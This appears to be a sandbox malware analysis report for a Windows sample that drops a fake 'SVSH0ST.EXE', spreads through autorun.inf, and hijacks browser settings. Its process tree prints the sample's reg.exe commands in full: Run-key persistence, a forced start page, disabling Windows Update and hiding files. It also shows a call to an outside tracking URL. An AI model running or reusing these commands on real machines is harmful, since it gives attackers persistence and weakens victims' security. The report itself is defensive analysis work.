ed81db76bc5222fed1be063cdf939e743908fe5a92bea094d306d71d0c68cd9e

Analysis

max time kernel
148s
max time network
150s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
12/07/2024, 05:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe
Size

387KB
MD5

3c34178caff3f42b3dab1de1fa024202
SHA1

41ff97e2341f4c0bbf6e1bdee3fd2aeb1f37c0a0
SHA256

ed81db76bc5222fed1be063cdf939e743908fe5a92bea094d306d71d0c68cd9e
SHA512

26952b204fd8aceb0bddf21aefe5ec0179ce7ddf911f2d74ccd5eb81ff260260ecbe5fb9ca76ce9f41c177c8391713847b2cbbcb92f2396cab978c5cd8f14438
SSDEEP

6144:+xkrjUcMX+m9F2idZecnl20lHRxp3gkncduD7yB9VCO6Sco4q8+dE6CqjOL6:tu+kF3Z4mxxnDqVTVOCq6

Score

7^/10

persistence

Malware Config

Signatures

Deletes itself 1 IoCs

pid	Process
2412	cmd.exe

Executes dropped EXE 2 IoCs

pid	Process
2728	SVSH0ST.EXE
2564	SVSH0ST.EXE

Loads dropped DLL 3 IoCs

pid	Process
2684	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe
2684	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe
2728	SVSH0ST.EXE

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Windows\\system32\\SVSH0ST.EXE"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Windows\\system32\\SVSH0ST.EXE"	reg.exe

Enumerates connected drives 3 TTPs 21 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\j:	SVSH0ST.EXE
File opened (read-only)	\??\n:	SVSH0ST.EXE
File opened (read-only)	\??\r:	SVSH0ST.EXE
File opened (read-only)	\??\t:	SVSH0ST.EXE
File opened (read-only)	\??\v:	SVSH0ST.EXE
File opened (read-only)	\??\p:	SVSH0ST.EXE
File opened (read-only)	\??\s:	SVSH0ST.EXE
File opened (read-only)	\??\u:	SVSH0ST.EXE
File opened (read-only)	\??\x:	SVSH0ST.EXE
File opened (read-only)	\??\z:	SVSH0ST.EXE
File opened (read-only)	\??\y:	SVSH0ST.EXE
File opened (read-only)	\??\g:	SVSH0ST.EXE
File opened (read-only)	\??\h:	SVSH0ST.EXE
File opened (read-only)	\??\i:	SVSH0ST.EXE
File opened (read-only)	\??\l:	SVSH0ST.EXE
File opened (read-only)	\??\m:	SVSH0ST.EXE
File opened (read-only)	\??\o:	SVSH0ST.EXE
File opened (read-only)	\??\q:	SVSH0ST.EXE
File opened (read-only)	\??\e:	SVSH0ST.EXE
File opened (read-only)	\??\k:	SVSH0ST.EXE
File opened (read-only)	\??\w:	SVSH0ST.EXE

Drops autorun.inf file 1 TTPs 9 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\Autorun.inf	SVSH0ST.EXE
File created	C:\Windows\SysWOW64\Autorun.inf	SVSH0ST.EXE
File opened for modification	C:\autorun.inf	SVSH0ST.EXE
File created	\??\c:\autorun.inf	SVSH0ST.EXE
File opened for modification	\??\c:\autorun.inf	SVSH0ST.EXE
File opened for modification	\??\f:\autorun.inf	SVSH0ST.EXE
File opened for modification	C:\Windows\SysWOW64\autorun.inf	SVSH0ST.EXE
File created	C:\autorun.inf	SVSH0ST.EXE
File created	\??\f:\autorun.inf	SVSH0ST.EXE

Drops file in System32 directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\autorun.inf	SVSH0ST.EXE
File created	C:\Windows\SysWOW64\Autorun.inf	SVSH0ST.EXE
File opened for modification	C:\Windows\SysWOW64\Autorun.inf	SVSH0ST.EXE
File created	C:\Windows\SysWOW64\SVSH0ST.EXE	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\SVSH0ST.EXE	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\SVSH0ST.EXE	SVSH0ST.EXE
File opened for modification	C:\Windows\SysWOW64\SVSH0ST.EXE	SVSH0ST.EXE

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1760 set thread context of 2684	1760	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe	30
PID 2728 set thread context of 2564	2728	SVSH0ST.EXE	32

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 35 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4AA3F8B1-57B8-11D4-B9CD-DE81EF03C4D2} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007081bf09cd640647a7fac0f956d7a27c00000000020000000000106600000001000020000000574b65edaa9d8c10d5a697452510b8bf78145116d67b6dde287c5f687ea5ace7000000000e8000000002000020000000aa2c10c0e74390ccc190e9d9aea7013ca83f6da288c6424e17297ee25bcfeb58200000002eef9b3082f680ac08c655aff1501c60de327c20d5cb0f0c227b4df27a96eeac400000006f6b5868e3405d980d626a5fd83742f5de8d5f46ae8e77a5cc4958b2586447a970ac158d43bf3bdb31c256888b63b2523a7eca80fe4d0e8e79a44d2515ba4bfd	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000007081bf09cd640647a7fac0f956d7a27c00000000020000000000106600000001000020000000b2dcca0d0a00a75f5d0dfeb8b3b5fa3beba6db35233696be59471e1a7b51eb04000000000e8000000002000020000000b9b0cf2c3d2d1151aedb2deb8c6630501b6bc59dcea3c97a2fd893e9307384b990000000bd38852dae656d8d915ac71243df3ad7dc93686a7c643516bdfd405c8809bd4e0785325d796b6fbc268436c9b38d17a9670b1e6878d3232cf99b1e968894ea12199ab28a038713a13b62da50b141e96c0b4cfe8a701c8e2138d02846b0efe59ca04b4c3deb0eb72bfb329d63b7dff60a47e461fa3680afa9ee55bca3836307828e12bee86cb194b53a2c2dd80f92a93240000000291b8a258c4d8692446e87f8120526eefc8639750be27964e02752c9e0537d495d623ab360b7ef629a32810c89fdc4acc75191b74670bcadb3da777cfb99cd99	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90c58c1ec5ebbf01	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "1802981125"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe

Modifies Internet Explorer start page 1 TTPs 1 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://www.baidu.com"	reg.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
552	reg.exe
2792	reg.exe
1768	reg.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeSystemtimePrivilege	2564	SVSH0ST.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2936	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2936	iexplore.exe
2936	iexplore.exe
2072	IEXPLORE.EXE
2072	IEXPLORE.EXE
2072	IEXPLORE.EXE
2072	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1760 wrote to memory of 2684	1760	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe	30
PID 1760 wrote to memory of 2684	1760	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe	30
PID 1760 wrote to memory of 2684	1760	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe	30
PID 1760 wrote to memory of 2684	1760	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe	30
PID 1760 wrote to memory of 2684	1760	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe	30
PID 1760 wrote to memory of 2684	1760	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe	30
PID 1760 wrote to memory of 2684	1760	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe	30
PID 1760 wrote to memory of 2684	1760	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe	30
PID 1760 wrote to memory of 2684	1760	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe	30
PID 1760 wrote to memory of 2684	1760	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe	30
PID 1760 wrote to memory of 2684	1760	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe	30
PID 1760 wrote to memory of 2684	1760	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe	30
PID 2684 wrote to memory of 2728	2684	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe	31
PID 2684 wrote to memory of 2728	2684	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe	31
PID 2684 wrote to memory of 2728	2684	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe	31
PID 2684 wrote to memory of 2728	2684	3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe	31
PID 2728 wrote to memory of 2564	2728	SVSH0ST.EXE	32
PID 2728 wrote to memory of 2564	2728	SVSH0ST.EXE	32
PID 2728 wrote to memory of 2564	2728	SVSH0ST.EXE	32
PID 2728 wrote to memory of 2564	2728	SVSH0ST.EXE	32
PID 2728 wrote to memory of 2564	2728	SVSH0ST.EXE	32
PID 2728 wrote to memory of 2564	2728	SVSH0ST.EXE	32
PID 2728 wrote to memory of 2564	2728	SVSH0ST.EXE	32
PID 2728 wrote to memory of 2564	2728	SVSH0ST.EXE	32
PID 2728 wrote to memory of 2564	2728	SVSH0ST.EXE	32
PID 2728 wrote to memory of 2564	2728	SVSH0ST.EXE	32
PID 2728 wrote to memory of 2564	2728	SVSH0ST.EXE	32
PID 2728 wrote to memory of 2564	2728	SVSH0ST.EXE	32
PID 2564 wrote to memory of 552	2564	SVSH0ST.EXE	33
PID 2564 wrote to memory of 552	2564	SVSH0ST.EXE	33
PID 2564 wrote to memory of 552	2564	SVSH0ST.EXE	33
PID 2564 wrote to memory of 552	2564	SVSH0ST.EXE	33
PID 2564 wrote to memory of 2792	2564	SVSH0ST.EXE	34
PID 2564 wrote to memory of 2792	2564	SVSH0ST.EXE	34
PID 2564 wrote to memory of 2792	2564	SVSH0ST.EXE	34
PID 2564 wrote to memory of 2792	2564	SVSH0ST.EXE	34
PID 2564 wrote to memory of 2200	2564	SVSH0ST.EXE	35
PID 2564 wrote to memory of 2200	2564	SVSH0ST.EXE	35
PID 2564 wrote to memory of 2200	2564	SVSH0ST.EXE	35
PID 2564 wrote to memory of 2200	2564	SVSH0ST.EXE	35
PID 2564 wrote to memory of 876	2564	SVSH0ST.EXE	38
PID 2564 wrote to memory of 876	2564	SVSH0ST.EXE	38
PID 2564 wrote to memory of 876	2564	SVSH0ST.EXE	38
PID 2564 wrote to memory of 876	2564	SVSH0ST.EXE	38
PID 2564 wrote to memory of 800	2564	SVSH0ST.EXE	40
PID 2564 wrote to memory of 800	2564	SVSH0ST.EXE	40
PID 2564 wrote to memory of 800	2564	SVSH0ST.EXE	40
PID 2564 wrote to memory of 800	2564	SVSH0ST.EXE	40
PID 2564 wrote to memory of 1768	2564	SVSH0ST.EXE	42
PID 2564 wrote to memory of 1768	2564	SVSH0ST.EXE	42
PID 2564 wrote to memory of 1768	2564	SVSH0ST.EXE	42
PID 2564 wrote to memory of 1768	2564	SVSH0ST.EXE	42
PID 2564 wrote to memory of 2904	2564	SVSH0ST.EXE	43
PID 2564 wrote to memory of 2904	2564	SVSH0ST.EXE	43
PID 2564 wrote to memory of 2904	2564	SVSH0ST.EXE	43
PID 2564 wrote to memory of 2904	2564	SVSH0ST.EXE	43
PID 2564 wrote to memory of 2936	2564	SVSH0ST.EXE	44
PID 2564 wrote to memory of 2936	2564	SVSH0ST.EXE	44
PID 2564 wrote to memory of 2936	2564	SVSH0ST.EXE	44
PID 2564 wrote to memory of 2936	2564	SVSH0ST.EXE	44
PID 2904 wrote to memory of 2172	2904	cmd.exe	48
PID 2904 wrote to memory of 2172	2904	cmd.exe	48
PID 2904 wrote to memory of 2172	2904	cmd.exe	48
PID 2904 wrote to memory of 2172	2904	cmd.exe	48

C:\Users\Admin\AppData\Local\Temp\3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1760
- C:\Users\Admin\AppData\Local\Temp\3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.exe"
  2⤵
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:2684
- - C:\Windows\SysWOW64\SVSH0ST.EXE
    C:\Windows\system32\SVSH0ST.EXE
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2728
  - - C:\Windows\SysWOW64\SVSH0ST.EXE
      "C:\Windows\SysWOW64\SVSH0ST.EXE"
      4⤵
      Executes dropped EXE
      Enumerates connected drives
      Drops autorun.inf file
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2564
    - - C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V svchost /T REG_SZ /D C:\Windows\system32\SVSH0ST.EXE /F
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:552
    - - C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V svchost /T REG_SZ /D C:\Windows\system32\SVSH0ST.EXE /F
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2792
    - - C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d http://www.baidu.com /f
        5⤵
        Modifies Internet Explorer settings
        Modifies Internet Explorer start page
        
        PID:2200
    - - C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        5⤵
        
        PID:876
    - - C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate /v DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f
        5⤵
        
        PID:800
    - - C:\Windows\SysWOW64\reg.exe
        
        "C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_SZ /d 3 /f
        5⤵
        Modifies registry key
        
        PID:1768
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c net start shellHWDetection
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2904
      - C:\Windows\SysWOW64\net.exe
        
        net start shellHWDetection
        6⤵
        
        PID:2172
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start shellHWDetection
        7⤵
        
        PID:2448
    - - C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://www.aijingru.com/TJ.asp
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:2936
      - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2936 CREDAT:275457 /prefetch:2
        6⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2072
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.bat
    3⤵
    PID:2128
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\3c34178caff3f42b3dab1de1fa024202_JaffaCakes118.bat""
    3⤵
    - Deletes itself
    PID:2412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d5c7633000f3c7a5b3fe863f2798376c

SHA1
556b0ef6d8dee106733cbf48ab9a31a146eeae07

SHA256
168da2b965958661efad5a14bef20686c08664f379438110649482b589bcbab0

SHA512
a2a8e8c165d4500d7c5ebfccd01c651375e50a5e440c06ccc3ed2c0d979dcaba1c76d875ae7d5aab1bad93e882155c04d0e6bed82527a92ebe1cf2b665de8a4e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d3a6a5c62ea7ea13f8e756164b86831f

SHA1
abea84fb8ad84b517dab91529ee59b26756fb37f

SHA256
138b5bd2ea6545aa1a4ba7e8e7ef9f9050eb1b8ecf78343040f64a954761900b

SHA512
7e9d6f33a885e7e3fae0d74bb2cb83f7de9d105f09c360c6534001470c02b1fbc334f54fc02184257d2143f5dc173ce045c77252d1cd53e482b4c82c5906f76e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
eea797c7eb40bb163939600e91edf96a

SHA1
98f6a4ae67b82624e1715d3b3c53a52c3a02f04e

SHA256
58ae05000a88c716a3409eeefd85841cc0d773b752b5912a7998b488d16a2d12

SHA512
312f259f59b2f6b13ec4b1925ba05d24fcef321941796c566c0924ec0655d2d4e3c294f6f40f2058a39de2771006aa3912a352aefd3bb1399505706978345a19

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
93c8cf0099bb0878125c87b28eed13cb

SHA1
3747aa2c2c7a3ea8e43b1852334608af556f52ea

SHA256
d72fb7df609bb4bedc7757379e7e6399a4303aaea380cfd24d1dab1bb3a1854a

SHA512
d218b28384f4722a35261405373c4388124771cf91b99f936db562456317e3cfbab378e061b10c3b65634b2543e9b96e336a1187d507af6ca98980d01dce2f06

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d30936e4515025f8674d74bac0597274

SHA1
94a96d3c50996a6577f29e5f432c49e24360b1f7

SHA256
67f8edfc742e3b5a31b01ad3569a0ddefdc53210e8db62b6ba49f15b3eb65591

SHA512
6ee8c7f97ebf2d140f4cc3b8f5a01dbccf6d8d09bd7d74e317861e5dedcc6a3c40450644fbc9998884e3e65807295b7c9d6fde0badf1bd6c163cad225a4bad83

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
59e3154a5d1f970867d2bec881d1a5bc

SHA1
fd0d7e0afcdecb4e0f94e99c28127bede3bbc13e

SHA256
aadc4e1fde3c6ab91ea56eddf9720ad7dfb1fa7c0b7e02bfd6b58a592b070b47

SHA512
ec32916282489d781b13381adcb4a98a7cb6d514c49b95485864239699aa43e1e3e6c355627b381ce19775e4021cf08f553b0afae309235a8800daf337135d3a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
07d8fc14b3dd0de13b5f42b4aecb25ed

SHA1
e9ff630d670dc659a2c57baa724da0b2821f46b6

SHA256
d2d404030d68810f0a6e4658250cec6b8fb5d1332a7d75a39bc80059273691c6

SHA512
d10a640bbdc64b2800c035181a8a91427e6508167945e9502f26c641b9e62fe82f53336f866e5d6082472a4ddf047b77529f7362c2b7dfbef57acbf2af40c135

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
f47e808a595f7897054f0f46b5438b99

SHA1
5b4c9f24fb093acf1b9ff1641a33ab5b107d265a

SHA256
30af8d3c552a122a3070f013cad80f76a17d169bb5883cf059c092de56da43c4

SHA512
0096a876471950f485e4ad95b8b293d1b9d300238d897b1598ed41ee14e08663e4be5ecf8f1232a8ce3b91fb6574fa4a84cc380f2ac78c9ff13b9702978306dc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
5f2c2f35fb1325bbc315e6ce30f35522

SHA1
64456e1127f49752c28565e4d025b160341a808f

SHA256
4a72551aef5ed43f3cf3fdc07580557f0b8ea601b56200ff3965a647c8292e9e

SHA512
228c8105da4e00dabae446fc22f056239a6752725d478cd1c087416d6db8e43395d0858efaaa7e0b945ecb3c789c130f75ca91fee2e6030897f6f29a79da6adb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
f2582d58aef00cb375ae3c1cd286efba

SHA1
c2911c8c7a22630c72f00ab95c576ba94697ffdb

SHA256
988ee7b1befe848ea23df8369e99b64e20cf3fc3e820cdb39cb3d115a64cdcaf

SHA512
65c1ef2b77fb6832be5f7d82596b91464a323044faade85a04813641988c87d4351559eccf6b4da3a0de9c70dd5ad9f459cde4b9c52167e2333ea61ee1673f1f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1c296635e1d749df03850beaf6caa4dc

SHA1
c6f2f959ba28cf76fda65fdf504dae8830353c4e

SHA256
09af5cff109811033bb4c9eafc3362365312d52d71308fa20f57a9980edf208f

SHA512
d5cd0ad7718b94c67b009b964c1d07ff738cead73dd1041f1986e33734f560304e65a94d7ec24916c0cd4122332a0dcc7dea3cec0dc871de847ad86f4ab96038

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
89fe048b33c396ca2440e21b3237f9f4

SHA1
7a22824207c2ba3b5c57c599d0caa321ec244e63

SHA256
1f55f90cf4d8a3dad7ca0e6010e75ab0bd52639faa387ec3440811f9949a7d42

SHA512
8cb5fc3b41cdce5748121a74e684d65c73d76df446e829c843f8b37c64e5d15a523cd26f7d5a8845405037e873e65b437d340fed68409765c2cfdf98a1b8953e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
723fc1c637a3704e500108a2e88ff2ee

SHA1
03fa21dba6a28f2e391955fb49c55b4da5bb1965

SHA256
